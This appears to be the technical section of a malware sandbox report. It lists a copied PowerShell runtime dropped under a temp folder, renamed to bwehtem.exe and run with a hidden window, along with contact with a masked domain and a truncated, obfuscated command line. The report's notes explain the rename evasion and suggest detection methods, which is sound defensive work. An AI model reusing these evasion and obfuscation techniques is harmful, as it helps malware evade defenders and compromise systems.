Technical Information
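- '%TEMP%\o_sdan\bwehtem.exe' $aaqlzpfhxkauouzdlwehacsn_uizgvzeeu='rce;';$pgxz_ropyyotsup='ss; $pat';$dsdyeaaevtfqugpoyyy_gwtbod='}S';$wkalpkbpmyuqmaye_ydmbtaffejos_ybxlqdb_e='ve-tech';$oacj_vayeqbvjgsyyepd='honl';$uauzxsgm...
  (The command line is truncated in this report. The arguments appear to be a PowerShell script split into short string fragments stored in randomly named variables, so these literal fragments are unlikely to be stable indicators; process-creation logging with the full command line is what captures this invocation.)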
- %TEMP%\o_sdan\certificate.format.ps1xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.management.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.diagnostics.dll-help.xml
- %TEMP%\o_sdan\en-us\importallmodules.psd1
- %TEMP%\o_sdan\en-us\default.help.txt
- %TEMP%\o_sdan\en-us\about_ws-management_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_wmi_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_ise.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_2.0.help.txt
- %TEMP%\o_sdan\en-us\about_wildcards.help.txt
- %TEMP%\o_sdan\en-us\about_while.help.txt
- %TEMP%\o_sdan\en-us\about_variables.help.txt
- %TEMP%\o_sdan\en-us\about_type_operators.help.txt
- %TEMP%\o_sdan\en-us\about_types.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_try_catch_finally.help.txt
- %TEMP%\o_sdan\en-us\about_trap.help.txt
- %TEMP%\o_sdan\en-us\about_transactions.help.txt
- %TEMP%\o_sdan\en-us\about_throw.help.txt
- %TEMP%\o_sdan\en-us\about_switch.help.txt
- %TEMP%\o_sdan\en-us\about_split.help.txt
- %TEMP%\o_sdan\en-us\about_special_characters.help.txt
- %TEMP%\o_sdan\en-us\about_signing.help.txt
- %TEMP%\o_sdan\en-us\about_session_configurations.help.txt
- %TEMP%\o_sdan\en-us\about_script_internationalization.help.txt
- %TEMP%\o_sdan\en-us\about_script_blocks.help.txt
- %TEMP%\o_sdan\en-us\about_scripts.help.txt
- %TEMP%\o_sdan\en-us\about_scopes.help.txt
- %TEMP%\o_sdan\en-us\about_return.help.txt
- %TEMP%\o_sdan\en-us\about_reserved_words.help.txt
- %TEMP%\o_sdan\en-us\about_requires.help.txt
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.utility.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.consolehost.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.security.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.wsman.management.dll-help.xml
- %TEMP%\o_sdan\registry.format.ps1xml
- %TEMP%\o_sdan\pwrshsip.dll
- %TEMP%\o_sdan\pwrshmsg.dll
- %TEMP%\o_sdan\pspluginwkr.dll
- %TEMP%\o_sdan\psevents.dll
- %TEMP%\o_sdan\powershell_ise.exe
- %TEMP%\o_sdan\powershelltrace.format.ps1xml
- %TEMP%\o_sdan\powershellcore.format.ps1xml
- %TEMP%\o_sdan\powershell.exe
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.psd1
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.format.ps1xml
- %TEMP%\o_sdan\modules\troubleshootingpack\en-us\microsoft.windows.diagnosis.troubleshootingpack.dll-help.xml
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psm1
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psd1
- %TEMP%\o_sdan\modules\bitstransfer\en-us\microsoft.backgroundintelligenttransfer.management.dll-help.xml
- %TEMP%\o_sdan\modules\bitstransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
- %TEMP%\o_sdan\modules\bitstransfer\en-us\about_bits_cmdlets.help.txt
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.psd1
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.format.ps1xml
- %TEMP%\o_sdan\modules\applocker\en-us\microsoft.security.applicationid.policymanagement.cmdlets.dll-help.xml
- %TEMP%\o_sdan\modules\applocker\applocker.psd1
- %TEMP%\o_sdan\help.format.ps1xml
- %TEMP%\o_sdan\getevent.types.ps1xml
- %TEMP%\o_sdan\filesystem.format.ps1xml
- %TEMP%\o_sdan\en-us\system.management.automation.dll-help.xml
- %TEMP%\o_sdan\en-us\pwrshmsg.dll.mui
- %TEMP%\o_sdan\en-us\pspluginwkr.dll.mui
- %TEMP%\o_sdan\en-us\psevents.dll.mui
- %TEMP%\o_sdan\en-us\powershell_ise.resources.dll
- %TEMP%\o_sdan\en-us\powershell.exe.mui
- %TEMP%\o_sdan\types.ps1xml
- %TEMP%\o_sdan\en-us\about_remote_troubleshooting.help.txt
- %TEMP%\o_sdan\en-us\about_remote_requirements.help.txt
- %TEMP%\o_sdan\en-us\about_remote_output.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced_methods.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced.help.txt
- %TEMP%\o_sdan\en-us\about_functions.help.txt
- %TEMP%\o_sdan\en-us\about_format.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_foreach.help.txt
- %TEMP%\o_sdan\en-us\about_for.help.txt
- %TEMP%\o_sdan\en-us\about_execution_policies.help.txt
- %TEMP%\o_sdan\en-us\about_eventlogs.help.txt
- %TEMP%\o_sdan\en-us\about_escape_characters.help.txt
- %TEMP%\o_sdan\en-us\about_environment_variables.help.txt
- %TEMP%\o_sdan\en-us\about_do.help.txt
- %TEMP%\o_sdan\en-us\about_debuggers.help.txt
- %TEMP%\o_sdan\en-us\about_data_sections.help.txt
- %TEMP%\o_sdan\en-us\about_core_commands.help.txt
- %TEMP%\o_sdan\en-us\about_continue.help.txt
- %TEMP%\o_sdan\en-us\about_comparison_operators.help.txt
- %TEMP%\o_sdan\en-us\about_commonparameters.help.txt
- %TEMP%\o_sdan\en-us\about_comment_based_help.help.txt
- %TEMP%\o_sdan\en-us\about_command_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_command_precedence.help.txt
- %TEMP%\o_sdan\en-us\about_break.help.txt
- %TEMP%\o_sdan\en-us\about_automatic_variables.help.txt
- %TEMP%\o_sdan\en-us\about_assignment_operators.help.txt
- %TEMP%\o_sdan\en-us\about_arrays.help.txt
- %TEMP%\o_sdan\en-us\about_arithmetic_operators.help.txt
- %TEMP%\o_sdan\en-us\about_aliases.help.txt
- %TEMP%\o_sdan\dotnettypes.format.ps1xml
- %TEMP%\o_sdan\diagnostics.format.ps1xml
- %TEMP%\o_sdan\compiledcomposition.microsoft.powershell.gpowershell.dll
- %TEMP%\o_sdan\en-us\about_functions_advanced_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_functions_cmdletbindingattribute.help.txt
- %TEMP%\o_sdan\en-us\about_hash_tables.help.txt
- %TEMP%\o_sdan\en-us\about_history.help.txt
- %TEMP%\o_sdan\en-us\about_remote_faq.help.txt
- %TEMP%\o_sdan\en-us\about_remote.help.txt
- %TEMP%\o_sdan\en-us\about_regular_expressions.help.txt
- %TEMP%\o_sdan\en-us\about_ref.help.txt
- %TEMP%\o_sdan\en-us\about_redirection.help.txt
- %TEMP%\o_sdan\en-us\about_quoting_rules.help.txt
- %TEMP%\o_sdan\en-us\about_pssnapins.help.txt
- %TEMP%\o_sdan\en-us\about_pssession_details.help.txt
- %TEMP%\o_sdan\en-us\about_pssessions.help.txt
- %TEMP%\o_sdan\en-us\about_providers.help.txt
- %TEMP%\o_sdan\en-us\about_properties.help.txt
- %TEMP%\o_sdan\en-us\about_prompts.help.txt
- %TEMP%\o_sdan\en-us\about_profiles.help.txt
- %TEMP%\o_sdan\en-us\about_preference_variables.help.txt
- %TEMP%\o_sdan\en-us\about_path_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_pipelines.help.txt
- %TEMP%\o_sdan\en-us\about_parsing.help.txt
- %TEMP%\o_sdan\en-us\about_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_operators.help.txt
- %TEMP%\o_sdan\en-us\about_objects.help.txt
- %TEMP%\o_sdan\en-us\about_modules.help.txt
- %TEMP%\o_sdan\en-us\about_methods.help.txt
- %TEMP%\o_sdan\en-us\about_logical_operators.help.txt
- %TEMP%\o_sdan\en-us\about_locations.help.txt
- %TEMP%\o_sdan\en-us\about_line_editing.help.txt
- %TEMP%\o_sdan\en-us\about_language_keywords.help.txt
- %TEMP%\o_sdan\en-us\about_join.help.txt
- %TEMP%\o_sdan\en-us\about_job_details.help.txt
- %TEMP%\o_sdan\en-us\about_jobs.help.txt
- %TEMP%\o_sdan\en-us\about_if.help.txt
- %TEMP%\o_sdan\en-us\about_remote_jobs.help.txt
- %TEMP%\o_sdan\wsman.format.ps1xml
- %TEMP%\o_sdan\en-us\about_aliases.help.txt
- %TEMP%\o_sdan\en-us\powershell.exe.mui
- %TEMP%\o_sdan\en-us\microsoft.wsman.management.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.security.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.consolehost.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.utility.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.management.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.diagnostics.dll-help.xml
- %TEMP%\o_sdan\en-us\importallmodules.psd1
- %TEMP%\o_sdan\en-us\default.help.txt
- %TEMP%\o_sdan\en-us\about_ws-management_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_wmi_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_ise.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_2.0.help.txt
- %TEMP%\o_sdan\en-us\about_wildcards.help.txt
- %TEMP%\o_sdan\en-us\about_variables.help.txt
- %TEMP%\o_sdan\en-us\psevents.dll.mui
- %TEMP%\o_sdan\en-us\about_type_operators.help.txt
- %TEMP%\o_sdan\en-us\about_types.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_try_catch_finally.help.txt
- %TEMP%\o_sdan\en-us\about_trap.help.txt
- %TEMP%\o_sdan\en-us\about_transactions.help.txt
- %TEMP%\o_sdan\en-us\about_throw.help.txt
- %TEMP%\o_sdan\en-us\about_switch.help.txt
- %TEMP%\o_sdan\en-us\about_split.help.txt
- %TEMP%\o_sdan\en-us\about_special_characters.help.txt
- %TEMP%\o_sdan\en-us\about_signing.help.txt
- %TEMP%\o_sdan\en-us\about_session_configurations.help.txt
- %TEMP%\o_sdan\en-us\about_script_internationalization.help.txt
- %TEMP%\o_sdan\en-us\about_script_blocks.help.txt
- %TEMP%\o_sdan\en-us\about_while.help.txt
- %TEMP%\o_sdan\en-us\about_properties.help.txt
- %TEMP%\o_sdan\en-us\pspluginwkr.dll.mui
- %TEMP%\o_sdan\registry.format.ps1xml
- %TEMP%\o_sdan\pwrshsip.dll
- %TEMP%\o_sdan\pwrshmsg.dll
- %TEMP%\o_sdan\pspluginwkr.dll
- %TEMP%\o_sdan\psevents.dll
- %TEMP%\o_sdan\powershell_ise.exe
- %TEMP%\o_sdan\powershelltrace.format.ps1xml
- %TEMP%\o_sdan\powershellcore.format.ps1xml
- %TEMP%\o_sdan\help.format.ps1xml
- %TEMP%\o_sdan\getevent.types.ps1xml
- %TEMP%\o_sdan\filesystem.format.ps1xml
- %TEMP%\o_sdan\dotnettypes.format.ps1xml
- %TEMP%\o_sdan\diagnostics.format.ps1xml
- %TEMP%\o_sdan\compiledcomposition.microsoft.powershell.gpowershell.dll
- %TEMP%\o_sdan\en-us\about_scripts.help.txt
- %TEMP%\o_sdan\en-us\powershell_ise.resources.dll
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.psd1
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.format.ps1xml
- %TEMP%\o_sdan\modules\troubleshootingpack\en-us\microsoft.windows.diagnosis.troubleshootingpack.dll-help.xml
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psm1
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psd1
- %TEMP%\o_sdan\modules\bitstransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.psd1
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.format.ps1xml
- %TEMP%\o_sdan\modules\bitstransfer\en-us\microsoft.backgroundintelligenttransfer.management.dll-help.xml
- %TEMP%\o_sdan\modules\bitstransfer\en-us\about_bits_cmdlets.help.txt
- %TEMP%\o_sdan\modules\applocker\applocker.psd1
- %TEMP%\o_sdan\modules\applocker\en-us\microsoft.security.applicationid.policymanagement.cmdlets.dll-help.xml
- %TEMP%\o_sdan\examples\profile.ps1
- %TEMP%\o_sdan\en-us\system.management.automation.dll-help.xml
- %TEMP%\o_sdan\bwehtem.exe
- %TEMP%\o_sdan\en-us\pwrshmsg.dll.mui
- %TEMP%\o_sdan\en-us\about_scopes.help.txt
- %TEMP%\o_sdan\en-us\about_return.help.txt
- %TEMP%\o_sdan\en-us\about_reserved_words.help.txt
- %TEMP%\o_sdan\en-us\about_do.help.txt
- %TEMP%\o_sdan\en-us\about_history.help.txt
- %TEMP%\o_sdan\en-us\about_hash_tables.help.txt
- %TEMP%\o_sdan\en-us\about_functions_cmdletbindingattribute.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced_methods.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced.help.txt
- %TEMP%\o_sdan\en-us\about_functions.help.txt
- %TEMP%\o_sdan\en-us\about_format.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_foreach.help.txt
- %TEMP%\o_sdan\en-us\about_for.help.txt
- %TEMP%\o_sdan\en-us\about_execution_policies.help.txt
- %TEMP%\o_sdan\en-us\about_eventlogs.help.txt
- %TEMP%\o_sdan\en-us\about_escape_characters.help.txt
- %TEMP%\o_sdan\types.ps1xml
- %TEMP%\o_sdan\en-us\about_jobs.help.txt
- %TEMP%\o_sdan\en-us\about_debuggers.help.txt
- %TEMP%\o_sdan\en-us\about_data_sections.help.txt
- %TEMP%\o_sdan\en-us\about_core_commands.help.txt
- %TEMP%\o_sdan\en-us\about_continue.help.txt
- %TEMP%\o_sdan\en-us\about_comparison_operators.help.txt
- %TEMP%\o_sdan\en-us\about_commonparameters.help.txt
- %TEMP%\o_sdan\en-us\about_comment_based_help.help.txt
- %TEMP%\o_sdan\en-us\about_command_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_command_precedence.help.txt
- %TEMP%\o_sdan\en-us\about_break.help.txt
- %TEMP%\o_sdan\en-us\about_automatic_variables.help.txt
- %TEMP%\o_sdan\en-us\about_assignment_operators.help.txt
- %TEMP%\o_sdan\en-us\about_arrays.help.txt
- %TEMP%\o_sdan\en-us\about_arithmetic_operators.help.txt
- %TEMP%\o_sdan\en-us\about_environment_variables.help.txt
- %TEMP%\o_sdan\certificate.format.ps1xml
- %TEMP%\o_sdan\en-us\about_job_details.help.txt
- %TEMP%\o_sdan\en-us\about_line_editing.help.txt
- %TEMP%\o_sdan\en-us\about_join.help.txt
- %TEMP%\o_sdan\en-us\about_requires.help.txt
- %TEMP%\o_sdan\en-us\about_remote_troubleshooting.help.txt
- %TEMP%\o_sdan\en-us\about_remote_requirements.help.txt
- %TEMP%\o_sdan\en-us\about_remote_output.help.txt
- %TEMP%\o_sdan\en-us\about_remote_jobs.help.txt
- %TEMP%\o_sdan\en-us\about_remote_faq.help.txt
- %TEMP%\o_sdan\en-us\about_remote.help.txt
- %TEMP%\o_sdan\en-us\about_regular_expressions.help.txt
- %TEMP%\o_sdan\en-us\about_ref.help.txt
- %TEMP%\o_sdan\en-us\about_redirection.help.txt
- %TEMP%\o_sdan\en-us\about_quoting_rules.help.txt
- %TEMP%\o_sdan\en-us\about_pssnapins.help.txt
- %TEMP%\o_sdan\en-us\about_pssession_details.help.txt
- %TEMP%\o_sdan\en-us\about_language_keywords.help.txt
- %TEMP%\o_sdan\en-us\about_pssessions.help.txt
- %TEMP%\o_sdan\en-us\about_if.help.txt
- %TEMP%\o_sdan\en-us\about_prompts.help.txt
- %TEMP%\o_sdan\en-us\about_profiles.help.txt
- %TEMP%\o_sdan\en-us\about_preference_variables.help.txt
- %TEMP%\o_sdan\en-us\about_pipelines.help.txt
- %TEMP%\o_sdan\en-us\about_path_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_parsing.help.txt
- %TEMP%\o_sdan\en-us\about_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_operators.help.txt
- %TEMP%\o_sdan\en-us\about_objects.help.txt
- %TEMP%\o_sdan\en-us\about_modules.help.txt
- %TEMP%\o_sdan\en-us\about_methods.help.txt
- %TEMP%\o_sdan\en-us\about_logical_operators.help.txt
- %TEMP%\o_sdan\en-us\about_locations.help.txt
- %TEMP%\o_sdan\en-us\about_providers.help.txt
- %TEMP%\o_sdan\wsman.format.ps1xml
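- from %TEMP%\o_sdan\powershell.exe to %TEMP%\o_sdan\bwehtem.exe
  (The dropped powershell.exe is moved to a random-looking name before it is run, so rules keyed on the process image name powershell.exe will not match this execution; matching on the binary's embedded original file name or its hash, and on a PowerShell host running from under %TEMP%, is more reliable.)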
- 'ac######techsolutions.com':443
- 'ac######techsolutions.com':443
- DNS ASK ac######techsolutions.com
- '%TEMP%\o_sdan\bwehtem.exe' $aaqlzpfhxkauouzdlwehacsn_uizgvzeeu='rce;';$pgxz_ropyyotsup='ss; $pat';$dsdyeaaevtfqugpoyyy_gwtbod='}S';$wkalpkbpmyuqmaye_ydmbtaffejos_ybxlqdb_e='ve-tech';$oacj_vayeqbvjgsyyepd='honl';$uauzxsgm...' (with hidden window)